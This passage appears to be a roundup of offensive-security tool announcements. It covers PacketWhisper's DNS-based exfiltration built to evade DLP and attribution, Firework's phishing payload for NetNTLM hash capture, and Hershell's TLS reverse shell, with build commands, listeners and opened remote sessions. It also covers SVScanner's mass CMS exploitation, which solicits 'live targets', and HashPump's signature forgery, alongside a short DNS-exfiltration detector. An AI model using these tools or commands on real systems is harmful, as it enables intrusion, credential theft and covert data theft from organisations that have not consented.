
PacketWhisper - Stealthily Exfiltrate Data And Defeat Attribution Using DNS Queries And Text-Based Steganography


PacketWhisper - Stealthily Transfer Data & Defeat Attribution Using DNS Queries & Text-Based Steganography, without the need for attacker-controlled Name Servers or domains; Evade DLP/MLS Devices; Defeat Data- & DNS Name Server Whitelisting Controls. Convert any file type (e.g. executables, Office, Zip, images) into a list of Fully Qualified Domain Names (FQDNs), use DNS queries to transfer data. Simple yet extremely effective.

Author
Joe Gervais (TryCatchHCF)

Why is this different from every other DNS exfiltration technique?
Traditional DNS exfiltration relies on one of the following: DNS tunneling; Hiding data in DNS query fields; or Encoded / encrypted payloads that are broken up and used as subdomains in the DNS query. All of these methods require that the attacker control a domain and/or an associated DNS Name Server to receive the data, which leads to attribution. Those approaches are also vulnerable to DNS Name Server blacklisting (common) and whitelisting (increasingly common). Another problem is that DFIR analysts are familiar with these methods, and SIEM systems will often detect and alert on seeing them.
PacketWhisper overcomes these limitations.
What if data could be transferred using the target's own whitelisted DNS servers, without the communicating systems ever directly connecting to each other or to a common endpoint? Even if the network boundary employed data whitelisting to block data exfiltration?

How It Works
To make it all happen, PacketWhisper combines DNS queries with text-based steganography. Leveraging the Cloakify Toolset, it transforms the payload into a list of FQDN strings. PacketWhisper then uses the list of FQDNs to create sequential DNS queries, transferring the payload across (or within) network boundaries, with the data hidden in plain sight, and without the two systems ever directly connecting to each other or to a common endpoint. The ciphers used by PacketWhisper provide multiple levels of deception to avoid generating alerts as well as to mislead analysis attempts.
To receive the data, you capture the network traffic containing the DNS queries, using whatever method is most convenient for you. (See "Capturing The PCAP File" below for examples of capture points.) You then load the captured PCAP file into PacketWhisper (running on whatever system is convenient), which extracts the payload from the file and Decloakifies it into its original form.
DNS is an attractive protocol to use because, even though it's a relatively slow means of transferring data, DNS is almost always allowed across network boundaries, even on the most sensitive networks.
Important note: We're using DNS queries to transfer the data, not successful DNS lookups. PacketWhisper never needs to successfully resolve any of its DNS queries. In fact PacketWhisper doesn't even look at the DNS responses. This expands our use cases, and underscores the fact that we never need to control a domain we're querying for, never need to control a DNS Name Server handling DNS requests.
So using PacketWhisper, we transform a payload that looks like this:


Into a list of FQDNs like this:


Which PacketWhisper turns into DNS queries that show up in network traffic like this:


Which you capture as a PCAP file anywhere along the DNS resolution path, and then load that PCAP into your local copy of PacketWhisper to recover the payload:


Tutorial
See the DEF CON 26 slides (included in project) from my Packet Hacking Village presentation. The slides present background on DNS exfiltration, text-based steganography / Cloakify Toolset, and how PacketWhisper combines them all into a method for transferring data. I specifically created the slides to be useful on their own, so the background and information should be complete. However you can also view the video of my DC26 Packet Hacking Village presentation which provides additional context. [NOTE: Video should be online sometime in September, at which point I'll add the URL here.]
I've included a sample PCAP file in the project (cleverly named "sample.pcap") that contains separate payloads for each of the ciphers. They could have been any filetype, of course, but in this case I just transmitted text files into the PCAP. Load it up in PacketWhisper and give it a try!
As a quick test in your own environment, run PacketWhisper from a VM, then send a file while doing a packet capture on the VM's network interface via the host system. You can then load the PCAP file into whichever PacketWhisper instance is convenient to decode the file. Just remember it's not a speedy transfer. Smaller files and patience are your friend.

Requires
  1. Python 2.7.x (3.6.x port is underway)
  2. For decoding payloads: tcpdump (included on Linux & MacOS) or WinDump (Windows)
Question: "Why didn't you use Scapy or dnspython toolset?"
Answer: I hate project dependencies in my operational tools. I keep my projects as atomic, self-contained as possible for maximum reliability, especially on the client side where I may not control the environment and/or have minimal privileges. The way PacketWhisper is structured, I can get it running on a limited shell host just by tar'ing up the project and extracting on the target host.
Question: "Why isn't PacketWhisper a project fork of Cloakify Toolset?"
Answer: Same answer as above. We only need a very specific subset of Cloakify's capabilities, and adding everything else to PacketWhisper would just lead to a cluttered directory and tools/ciphers that can't be used by PacketWhisper. Since I own both projects, I promise to synchronize any changes between the two.

Run PacketWhisper
$ python packetWhisper.py

FQDN-Based Ciphers
FQDN-based ciphers consist of 3 categories:
  1. Unique Random Subdomain FQDNs (Recommended - avoids DNS caching, overcomes NAT)
  2. Unique Repeating FQDNs (DNS may cache, but overcomes NAT)
  3. Common Website FQDNs (DNS caching may block, NAT interferes)
Unique Random Subdomain FQDNs
RECOMMENDED CIPHER MODE FOR MOST USE CASES
These are FQDNs with randomized elements built into the subdomains. This helps prevent DNS caching, while also allowing us to transfer data beyond NAT'd network devices that may be along the DNS query path. Since the sending system's IP address isn't available beyond the NAT device, the cipher-generated subdomains contain unique tag elements to help us identify PacketWhisper payloads in the packet capture.
These ciphers mimic the formats of various services that rely on complex subdomains as a means to identify a session, user, cached content etc. This approach helps PacketWhisper's DNS queries blend in with the rest of the network's traffic.
The first part of the subdomain name is actually a string from the cipher list. The rest of the subdomain name is randomized to make each FQDN unique, which prevents DNS caching from shutting down the DNS query path prematurely. We then add the domain name. We construct the FQDNs this way to look like the usual FQDNs associated with the selected domain, to blend in better with normal webtraffic seen on any network.


Unique Repeating FQDNs
Created to stand out from all other DNS queries on the network, but without any randomization involved. This means that DNS caching may interfere, but as a side benefit your DNS queries will be easy for you to find even in the largest collection of multi-client pcaps. This is due to the fact that the FQDNs are odd endpoints, like the list of "Johns" (Red Lectroid aliens) at the fictional Yoyodyne Propulsion Systems from the movie 'Buckaroo Banzai Across the 8th Dimension'.


Common Website FQDNs
These are FQDNs constructed out of common Website URLs.
NOTE: Since most environments are NAT'd at the perimeter (removing visibility of client's IP address), this mode is generally only useful for transferring data between systems connected to the same local /24 network (for example, the guest wifi at your favorite coffee shop).
Since Common Website ciphers only have the source IP address as a way to distinguish their queries from all the other similar DNS queries on the network, PacketWhisper will transmit a unique "knock sequence" DNS query at the beginning and end of the payload, which helps us pick out the transmitting host from the pcap file later.
Example FQDN: www.github.com

Transmitting the Cloakified Payload
Once you've selected a cipher, PacketWhisper encodes (Cloakifies) the payload into a list of FQDN strings per the desired cipher. It then sequentially generates DNS requests to send the data along the DNS resolution path. PacketWhisper adds a small delay between each DNS query, which helps prevent out-of-order DNS requests.

Capturing the PCAP File
The key element here is of course being able to capture the network traffic containing the DNS queries that PacketWhisper generated. There are a lot of options, since you only need to be somewhere, anywhere, with visibility to the DNS query path.
Example Points of Capture:
  • Connected to the same local network (e.g. your local coffee shop)
  • Systems and devices that are internal to the organization
  • Perimeter network appliances
  • Network infrastructure outside of the organization
  • Network tap anywhere along the query path
Use your imagination. Any device along the DNS resolution path is an option, including wall displays. "Wait, what?"


NOTE: VPN connections block visibility between host and VPN exit node. If the client you're transferring from has an active VPN connection, you won't be able to see any DNS queries unless you can capture upstream from the VPN exit node. Even capturing on the same system will fail. Since many of you are probably using VPNs, if you want to test out PacketWhisper, try transmitting from a hosted virtual machine (VM) and capture the traffic on the VM's network interface on the host system.

Extracting The Payload
Once you've captured the pcap file, recover the payload by running PacketWhisper on a system that has tcpdump (included on Linux & MacOS) or WinDump (Windows) installed. PacketWhisper will ask you which cipher was used, then extract the payload from the pcap, and finally decode the extracted payload with the matching cipher.
Important note: Within the same PCAP, you can transmit one payload per cipher used. A PCAP containing more than one payload using the same cipher will cause problems. For example, my supplied 'example.pcap' file contains 5 payloads, one for each of the operational ciphers currently available. If one of the payloads had used the same cipher as another, PacketWhisper would fail to extract either of them. The easy fix is to break up the PCAP file (this is why the PacketWhisper transmit code prints out the UTC date-time when starting and ending transmission). I'm working on allowing multiple payloads using the same cipher; the solution is already in place, I just need to get around to it.

Limitations / Use Notes
Be sure your PCAP file is actually PCAP format. If you used tcpdump or WinDump to capture the file you'll be fine. Wireshark however offers a wide variety of "Save As..." options for saving Wireshark traffic, only one of which is actually tcpdump/PCAP friendly. I'm working on better error reporting to help catch mistakes early.
Not a secure encryption scheme. PacketWhisper is not a secure encryption scheme. It's vulnerable to frequency analysis attacks. Use the 'Unique Random Subdomain FQDNs' category of ciphers to add entropy and help degrade frequency analysis attacks. If payload secrecy is required, be sure to encrypt the payload before using PacketWhisper to process it.
Not a high-bandwidth transfer method. PacketWhisper relies on DNS queries, which are UDP-based, meaning order of delivery (or even successful delivery) of the request is not guaranteed. PacketWhisper by default adds a small (1/2-second) delay between each DNS query. You can safely transfer payloads at a rate of about 7.2K per hour (120 bytes per minute). That's based on the size of the original payload, not the Cloakified output file. You can opt for no delay between queries, which dramatically speeds up the transfer but at the risk of increased network noise and a corrupted payload.
And let's face it, if you have non-DNS modes of data transfer available, you can just use the main Cloakify Toolset project to hide the file in plain sight (maybe turn the payload into a list of PokemonGo monsters w/ LatLon coordinates) and use all that high bandwidth available via FTP/HTTP/etc. DNS is extremely useful when other protocols are blocked, but always be aware of your options.
DNS is DNS. Different OS's have different DNS caching policies, etc. Networks may be down, isolated, etc. PacketWhisper includes a quick manual check to see if it can resolve common FQDNs, but DNS is often a messy business. Remember the old IT troubleshooting mantra: "It's always DNS."

Detection / Prevention
See the DEF CON 26 slides (included in project) from my Packet Hacking Village presentation. Mitigation strategies are covered toward the end of the presentation. As in all things, "Security In Depth" is your friend, especially since DNS resolution paths span vast amounts of terrain that are outside of your organization's control.
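A defender-side check that follows from the page's own description (an added example, not PacketWhisper's code or the DEF CON slides): the "Unique Random Subdomain" mode produces many never-repeating names under one domain, the queries never need to resolve, and the sender paces them at a fixed delay. The resolver-log line format, the client addresses and the domain names in the constructed sample are assumptions.

```python
import re
import random
import statistics
from collections import defaultdict

# Constructed resolver-style log lines: "<epoch> <client-ip> <qname> <rcode>".
# The format is an assumption for this example, not any product's real output.
LINE_RE = re.compile(r"^(?P<ts>\d+(?:\.\d+)?) (?P<src>\S+) (?P<qname>\S+) (?P<rcode>\S+)$")


def build_sample_log(seed=7):
    """Constructed sample: one benign client and one client behaving like the
    'Unique Random Subdomain FQDNs' cipher mode (unique label every 0.5 s, no answers)."""
    rnd = random.Random(seed)
    lines = []
    for i in range(40):  # benign: a few well-known names, repeated, all resolving
        name = rnd.choice(["www.github.com", "api.github.com", "www.example.org"])
        lines.append(f"{1000 + i * 3} 10.0.0.5 {name} NOERROR")
    for i in range(30):  # suspect: fresh random subdomain of one domain, NXDOMAIN each time
        label = "".join(rnd.choice("abcdefghijklmnopqrstuvwxyz0123456789") for _ in range(12))
        lines.append(f"{1000 + i * 0.5:.1f} 10.0.0.9 cdn-{label}.example.net NXDOMAIN")
    return lines


def base_domain(qname):
    """Registered-domain approximation: last two labels (no public-suffix list here)."""
    parts = qname.rstrip(".").split(".")
    return ".".join(parts[-2:])


def analyze(lines, min_queries=20, unique_ratio=0.9, nxdomain_ratio=0.9):
    """Group queries by (client, base domain) and flag groups that look like a
    DNS-query side channel: almost all names distinct, almost all NXDOMAIN,
    and (as a supporting signal) machine-regular spacing between queries."""
    per_pair = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that do not match the expected format
        per_pair[(m["src"], base_domain(m["qname"]))].append(
            (float(m["ts"]), m["qname"].lower(), m["rcode"]))

    alerts = []
    for (src, dom), recs in per_pair.items():
        n = len(recs)
        if n < min_queries:
            continue
        uniq = len({q for _, q, _ in recs}) / n
        nx = sum(1 for _, _, rc in recs if rc == "NXDOMAIN") / n
        ts = sorted(t for t, _, _ in recs)
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        jitter = statistics.pstdev(gaps) if len(gaps) > 1 else 0.0

        reasons = []
        if uniq >= unique_ratio:
            reasons.append(f"{uniq:.0%} of {n} queries are distinct names")
        if nx >= nxdomain_ratio:
            reasons.append(f"{nx:.0%} NXDOMAIN")
        if reasons and jitter < 0.05:
            reasons.append(f"machine-regular spacing ({statistics.mean(gaps):.2f}s)")
        if reasons:
            alerts.append({"src": src, "domain": dom, "queries": n, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in analyze(build_sample_log()):
        print(alert)
```

The NXDOMAIN signal is weakest for the "Common Website FQDNs" mode, where the names do resolve; there the distinct-name ratio is low as well, so that mode needs the knock-sequence or source-host correlation the text describes rather than this heuristic.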



Firework - Leveraging Microsoft Workspaces in a Penetration Test


Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process. The tool also wraps some code from Responder to leverage its ability to capture NetNTLM hashes from a system that provisions a Workplace feed via it.

This tool may be used as part of a penetration test or red team exercise to create a .wcx payload (and associated feed) that if clicked on could be used to:
  • Phish for credentials - NetNTLM hashes will be sent if a user enters their credentials (or on older versions of Windows automatically).
  • Add items to the Start-Menu - After set-up, shortcuts are added to the Start-Menu which launch the served RDP file(s). These entries could potentially be used as part of a wider social engineering campaign.
  • Download resources - Resources such as the .rdp files and icon files are downloaded and updated by Windows on a daily basis (if authentication of the feed is disabled or is satisfied).
Read the SpiderLabs blog for a more detailed summary and walk through.

Installation
  • Tested with Python 2.7.x. (Python3 not currently supported, although the main Firework class could be used in Python 3)
$ pip install -r requirements.txt
  • The tool serves content over HTTPS and requires a certificate and private key to use the in-built web server with NetNTLM capture. Default files: cert.crt and key.pem

Usage

.-:::::'::::::::::.. .,::::::.:: . .::: ... :::::::.. ::: .
;;;'''' ;;;;;;;``;;;; ;;;;''''';;, ;; ;;;'.;;;;;;;. ;;;;``;;;; ;;; .;;,.
[[[,,== [[[ [[[,/[[[' [[cccc '[[, [[, [[',[[ \[[,[[[,/[[[' [[[[[/'
`$$$"`` $$$ $$$$$$c $$"""" Y$c$$$c$P $$$, $$$$$$$$$c _$$$$,
888 888 888b "88bo,888oo,__ "88"888 "888,_ _,88P888b "88bo,"888"88o,
"MM, MMM MMMM "W" """"YUMMM "M "M" "YMMMMMP" MMMM "W" MMM "MMP"


usage: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN]
[-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH]
[-t CERT] [-k KEY]

WCX workplace tool

optional arguments:
-h, --help show this help message and exit
-c COMPANY, --company COMPANY
Company name
-u URL, --url URL Feed URL
-a APP, --app APP App Name
-e EXT, --ext EXT App Extension
-i ICON, --icon ICON App Icon
-l LISTEN, --listen LISTEN
TLS Web Server Port
-r RDP, --rdp RDP RDP Server
-d DOMAIN, --domain DOMAIN
RDP Domain
-n USERNAME, --username USERNAME
RDP Username
-p PASSWORD, --password PASSWORD
RDP Password
-t CERT, --cert CERT SSL cert
-k KEY, --key KEY SSL key

Examples
Basic example:
  • Organisation Name: EvilCorp
  • URL to feed XML (or URL to Firework's in-built server): https://example.org/ - This is where Windows downloads the feed from.
  • Application Name: Firework
  • File Extension: .fwk
  • Icon File: firework.ico
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico 
The in-built web server will start on port 443 if cert.crt and key.pem are present in the current directory. This will force an NTLM challenge with Responder. If these files are not present, the tool will write all files to the local directory for your own hosting.
If you wish to start the in-built web server on alternate port use the -l flag as below:
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -l 8443
You can also add some customisations to the .rdp file that gets served.
  • Remote Desktop Server: dc.corp.local
  • Domain: corp.local
  • Username: admin
  • Password Crypt: Encrypted password that gets included in RDP file
Note: Passwords stored in .rdp files are likely ignored in a default config.
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.local -d corp.local -n admin -p <crypt password>

Payload
Having run the tool, 'payload.wcx' will be written to the current directory. This is the file that, when clicked on, starts the provisioning process.

Authors


MobSF (Mobile Security Framework) v1.0 - Mobile (Android/iOS) Automated Pen-Testing Framework


Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing framework capable of performing static, dynamic and malware analysis. It can be used for effective and fast security analysis of Android, iOS and Windows mobile applications and supports both binaries (APK, IPA & APPX) and zipped source code. MobSF can do dynamic application testing at runtime for Android apps and has Web API fuzzing capabilities powered by CapFuzz, a Web API specific security scanner. MobSF is designed to make your CI/CD or DevSecOps pipeline integration seamless.

MobSF is also bundled with Android Tamer and BlackArch

Documentation

MobSF Static Analyzer Docker Image
Automated prebuilt docker image of MobSF Static Analyzer is available from DockerHub
docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
Other docker options: MobSF Docker Options

Collaborators

Presentations

Video Course

What's New?

Screenshots

Static Analysis - Android APK



Static Analysis - iOS IPA


Static Analysis - Windows APPX


Dynamic Analysis - Android APK





Web API Fuzzer



Credits
  • Abhinav Sejpal (@Abhinav_Sejpal) - For poking me with bugs, feature requests, and UI & UX suggestions.
  • Amrutha VC (@amruthavc) - For the new MobSF logo
  • Anant Srivastava (@anantshri) - For Activity Tester Idea
  • Anto Joseph (@antojosep007) - For the help with SuperSU.
  • Bharadwaj Machiraju (@tunnelshade_) - For writing pyWebProxy from scratch
  • Dominik Schlecht - For the awesome work on adding Windows Phone App Static Analysis to MobSF
  • Esteban - Better Android Manifest Analysis and Static Analysis Improvement.
  • Matan Dobrushin - For adding Android ARM Emulator support to MobSF - Special thanks goes to cuckoo-droid, I got inspired by their code and idea for this implementation.
  • MindMac - For writing Android Blue Pill
  • Rahul (@c0dist) - Kali Support
  • Shuxin - Android Binary Analysis
  • Thomas Abraham - For JS Hacks on UI.
  • Tim Brown (@timb_machine) - For the iOS Binary Analysis Ruleset.
  • Oscar Alfonso Diaz - (@OscarAkaElvis) - For Dockerfile contributions


Ettercap - A Comprehensive Suite For Man In The Middle Attacks




Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.

Ettercap offers three interfaces: traditional command line, GUI and ncurses.

Supported Distributions

These distributions have been tested in both 32 and 64 bit flavors where possible
  • Debian/Ubuntu (Includes derivatives such as Kali, BackTrack, Mint, etc)
  • Fedora
  • Gentoo
  • Pentoo
  • Mac OSX (Snow Leopard & Lion)
  • FreeBSD
  • OpenBSD
  • NetBSD

Unsupported Distributions

Installation may work on the following distributions, but they are not supported. Additional settings may be required for compilation and/or use.
  • OpenSuSe
  • Solaris
  • Windows Vista
  • Windows 7
  • Windows 8

Dependencies

Ettercap source compilation requires the following dependencies
  • Libpcap & dev libraries
  • Libnet1 & dev libraries
  • Libpthread & dev libraries
  • Zlibc
  • Libtool
  • CMake 2.6
  • Flex
  • Bison
  • SSL Dissection Required Dependencies
    • LibSSL & dev libraries
  • GTK Related Dependencies
    • LibGTK & dev libraries
  • NCurses Related Dependencies
    • Libncurses & dev libraries
  • Filter Related Regex Dependencies
    • Libpcre & dev libraries

When building from source, dependencies should be found in the supported distribution repositories. Try these first before acquiring from external dependency source pages. All supported builds have been tested with dependencies installed from the distribution repository. 
If you are running on debian, or any debian based distro you can install the required dependencies by running:

sudo apt-get install debhelper cmake bison flex libgtk2.0-dev libltdl3-dev libncurses-dev libncurses5-dev\
libnet1-dev libpcap-dev libpcre3-dev libssl-dev libcurl4-openssl-dev ghostscript

For running ettercap you might need to install ethtool, needed for disabling interface offloads.


Parrot Security 4.2.2 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind


Updated kernel and core packages

Parrot 4.2 is powered by the latest Linux 4.18 debianized kernel with all the usual wireless patches.
A new version of the Debian-Installer now powers our netinstall images and the standard Parrot images.
Firmware packages were updated to add broader hardware support, including wireless devices and AMD vega graphics.

AppArmor and Firejail profiles were adjusted to offer a good compromise of security and usability for most of the desktop and CLI applications and services.



Important desktop updates

Parrot 4.2 now provides the latest libreoffice 6.1 release, Firefox 62 and many other important updates.

Desktop users will also find useful the inclusion of default .vimrc and .emacs config files with syntax highlight and line number columns.


Important tools updates

Armitage was finally updated, and the "missing RHOSTS error" was fixed.

We also imported the latest Metasploit 4.17.11 release, along with Wireshark 2.6, hashcat 4.2, edb-debugger 1.0 and many, many other updated tools.


New documentation portal

The new documentation portal can be visited at https://www.parrotsec.org/docs. Feel free to contribute and expand the documentation by sending a pull request on https://dev.parrotsec.org/parrot/documentation.


Hershell - Simple TCP reverse shell written in Go


Simple TCP reverse shell written in Go. It uses TLS to secure the communications, and provides a certificate public key fingerprint pinning feature, preventing traffic interception.

Supported OS are:
  • Windows
  • Linux
  • Mac OS
  • FreeBSD and derivatives

Why ?
Although meterpreter payloads are great, they are sometimes spotted by AV products.
The goal of this project is to get a simple reverse shell which can work on multiple systems.

How ?
Since it's written in Go, you can cross compile the source for the desired architecture.

Building the payload
To simplify things, you can use the provided Makefile. You can set the following environment variables:
  • GOOS : the target OS
  • GOARCH : the target architecture
  • LHOST : the attacker IP or domain name
  • LPORT : the listener port
For the GOOS and GOARCH variables, you can get the allowed values here.
However, some helper targets are available in the Makefile:
  • depends : generate the server certificate (required for the reverse shell)
  • windows32 : builds a windows 32 bits executable (PE 32 bits)
  • windows64 : builds a windows 64 bits executable (PE 64 bits)
  • linux32 : builds a linux 32 bits executable (ELF 32 bits)
  • linux64 : builds a linux 64 bits executable (ELF 64 bits)
  • macos : builds a mac os 64 bits executable (Mach-O)
For those targets, you just need to set the LHOST and LPORT environment variables.

Using the shell
Once executed, you will be provided with a remote shell. This custom interactive shell will allow you to execute system commands through cmd.exe on Windows, or /bin/sh on UNIX machines.
The following special commands are supported:
  • run_shell : drops you a system shell (allowing you, for example, to change directories)
  • inject <base64 shellcode> : injects a shellcode (base64 encoded) in the same process memory, and executes it (Windows only at the moment)
  • meterpreter IP:PORT : connects to a multi/handler to get a stage2 reverse tcp meterpreter from metasploit, and execute the shellcode in memory (Windows only at the moment)
  • exit : exit gracefully

Examples
First of all, you will need to generate a valid certificate:
$ make depends
openssl req -subj '/CN=sysdream.com/O=Sysdream/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA private key
....................................................................................++
.....++
writing new private key to 'server.key'
-----
cat server.key >> server.pem
For windows:
# Custom target
$ make GOOS=windows GOARCH=amd64 LHOST=192.168.0.12 LPORT=1234
# Predefined target
$ make windows32 LHOST=192.168.0.12 LPORT=1234
For Linux:
# Custom target
$ make GOOS=linux GOARCH=amd64 LHOST=192.168.0.12 LPORT=1234
# Predefined target
$ make linux32 LHOST=192.168.0.12 LPORT=1234
For Mac OS X
$ make macos LHOST=192.168.0.12 LPORT=1234

Listeners
On the server side, you can use the openssl integrated TLS server:
$ openssl s_server -cert server.pem -key server.key -accept 1234
Using default temp DH parameters
ACCEPT
bad gethostbyaddr
-----BEGIN SSL SESSION PARAMETERS-----
MHUCAQECAgMDBALALwQgsR3QwizJziqh4Ps3i+xHQKs9lvp5RfsYPWjEDB68Z4kE
MHnP0OD99CHv2u27THKvCHCggKEpgrPnKH+vNGJGPJZ42QylfkekhSwY5Mtr5qYI
5qEGAgRYgSfgogQCAgEspAYEBAEAAAA=
-----END SSL SESSION PARAMETERS-----
Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA:ECDHE-RSA-DES-CBC3-SHA:DES-CBC3-SHA
Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Supported Elliptic Curve Point Formats: uncompressed
Supported Elliptic Curves: P-256:P-384:P-521
Shared Elliptic curves: P-256:P-384:P-521
CIPHER is ECDHE-RSA-AES128-GCM-SHA256
Secure Renegotiation IS supported
Microsoft Windows [version 10.0.10586]
(c) 2015 Microsoft Corporation. Tous droits réservés.

C:\Users\LAB2\Downloads>
Or even better, use socat with its readline module, which gives you a handy history feature:
$ socat readline openssl-listen:1234,fork,reuseaddr,verify=0,cert=server.pem
Microsoft Windows [version 10.0.10586]
(c) 2015 Microsoft Corporation. Tous droits réservés.

C:\Users\LAB2\Downloads>
Or, and this is great, use a metasploit handler:
[172.17.0.2][Sessions: 0][Jobs: 0]: > use exploit/multi/handler
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set payload python/shell_reverse_tcp_ssl
payload => python/shell_reverse_tcp_ssl
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set lhost 192.168.122.1
lhost => 192.168.122.1
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set lport 4444
lport => 4444
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set handlersslcert /tmp/data/server.pem
handlersslcert => /tmp/data/server.pem
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set exitonsession false
exitonsession => false
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > exploit -j
[*] Exploit running as background job.

[-] Handler failed to bind to 192.168.122.1:4444
[*] Started reverse SSL handler on 0.0.0.0:4444
[*] Starting the payload handler...
[172.17.0.2][Sessions: 0][Jobs: 1]: exploit(handler) >
[*] Command shell session 1 opened (172.17.0.2:4444 -> 172.17.0.1:51995) at 2017-02-09 12:07:51 +0000
[172.17.0.2][Sessions: 1][Jobs: 1]: exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [version 10.0.10586]
(c) 2015 Microsoft Corporation. Tous droits réservés.

C:\Users\lab1\Downloads>whoami
whoami
desktop-jcfs2ok\lab1

C:\Users\lab1\Downloads>

Credits
Ronan Kervella <r.kervella -at- sysdream -dot- com>


VBScan 0.1.8 - Black Box vBulletin Vulnerability Scanner

OWASP VBScan (short for [VB]ulletin Vulnerability [Scan]ner) is an open source project written in Perl to detect vBulletin CMS vulnerabilities and analyse them.

Why OWASP VBScan ?
If you want to do a penetration test on a vBulletin forum, OWASP VBScan is your best shot ever! This project is faster than ever and is updated with the latest vBulletin vulnerabilities.

usage :
./vbscan.pl <target>
./vbscan.pl http://target.com/vbulletin

OWASP VBScan 0.1.7 introduction




What’s New in Version 0.1.8 [Self Challenge]
  • Updated vulnerabilities database 
  • "Email Before Registration Plugin" SQL exploit added
  • "Tapatalk vbulletin plugin" exploit added
  • "Routestring RCE" exploit added
  • Vbulletin possible password logger detector added
  • Allow start from any path
  • OpenRedirection founder module added
  • Vbulletin version comparing module added
  • A few enhancements


Telegram Vulners Bot - Exploit Search Engine And Security Feed In Your Pocket


Vulners Bot is a Telegram interface for the popular Vulners vulnerability database.
It gives you the ability to search for exploits, tools, patches and much more using Telegram inline queries.

But the most powerful feature is customizable security subscription feeds.
You can select predefined themes or create your own and receive updates on any preferred schedule.

For example: "Exploit updates" every day at 10 AM, "Security News" as soon as they arrive in the Vulners database, "Fresh CVE" every week, and any other custom scenario you can imagine. Filter the flood of new information the way you want.

RSS times are gone. Now bots rule the feeds :)


SVScanner - Scanner Vulnerability And Massive Exploit


SVScanner is a tool for scanning and massive exploits. Our tools target several open source CMSes.

Getting Started with Linux
1. git clone https://github.com/radenvodka/SVScanner.git
2. cd SVScanner
3. php svscanner.php

Getting Started with Windows
1. Download Xampp (PHP7)
2. Download SVScanner : https://github.com/radenvodka/SVScanner/releases
3. Open a cmd prompt and run: php svscanner.php

Systems we recommend :
1. PHP 7 and up
2. Install PHP modules: php-cli & php-curl for Linux

Credits

Want to contribute
Send the live target and the exploits used to maunikah1337@gmail.com


HashPump - A Tool To Exploit The Hash Length Extension Attack In Various Hashing Algorithms


A tool to exploit the hash length extension attack in various hashing algorithms.
Currently supported algorithms: MD5, SHA1, SHA256, SHA512.

Help Menu
$ hashpump -h
HashPump [-h help] [-t test] [-s signature] [-d data] [-a additional] [-k keylength]
HashPump generates strings to exploit signatures vulnerable to the Hash Length Extension Attack.
-h --help Display this message.
-t --test Run tests to verify each algorithm is operating properly.
-s --signature The signature from known message.
-d --data The data from the known message.
-a --additional The information you would like to add to the known message.
-k --keylength The length in bytes of the key being used to sign the original message with.
Version 1.2.0 with CRC32, MD5, SHA1, SHA256 and SHA512 support.
<Developed by bwall(@botnet_hunter)>

Sample Output
$ hashpump -s '6d5f807e23db210bc254a28be2d6759a0f5f5d99' --data 'count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo' -a '&waffle=liege' -k 14
0e41270260895979317fff3898ab85668953aaa2
count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02(&waffle=liege

    Compile & install
    $ git clone https://github.com/bwall/HashPump.git
    $ apt-get install g++ libssl-dev
    $ cd HashPump
    $ make
    $ make install
    apt-get and make install require root privileges to run correctly. The actual requirement is for -lcrypto, so depending on your operating system, your dependencies may vary.
    On OS X HashPump can also be installed using Homebrew:
    $ brew install hashpump

    Mentions
    HashPump has been mentioned in a few write-ups. If you are wondering how you can use HashPump, these are some great examples.

    Python Bindings
    Fellow Python lovers will be pleased with this addition. Saving me from writing an implementation of all these hash algorithms with the ability to modify states in Python, Python bindings have been added in the form of hashpumpy. This addition comes from zachriggle.

    Installation
    These Python bindings are available on PyPI and can be installed via pip:
    pip install hashpumpy

    Usage
    >>> import hashpumpy
    >>> help(hashpumpy.hashpump)
    Help on built-in function hashpump in module hashpumpy:

    hashpump(...)
    hashpump(hexdigest, original_data, data_to_add, key_length) -> (digest, message)

    Arguments:
    hexdigest(str): Hex-encoded result of hashing key + original_data.
    original_data(str): Known data used to get the hash result hexdigest.
    data_to_add(str): Data to append
    key_length(int): Length of unknown data prepended to the hash

    Returns:
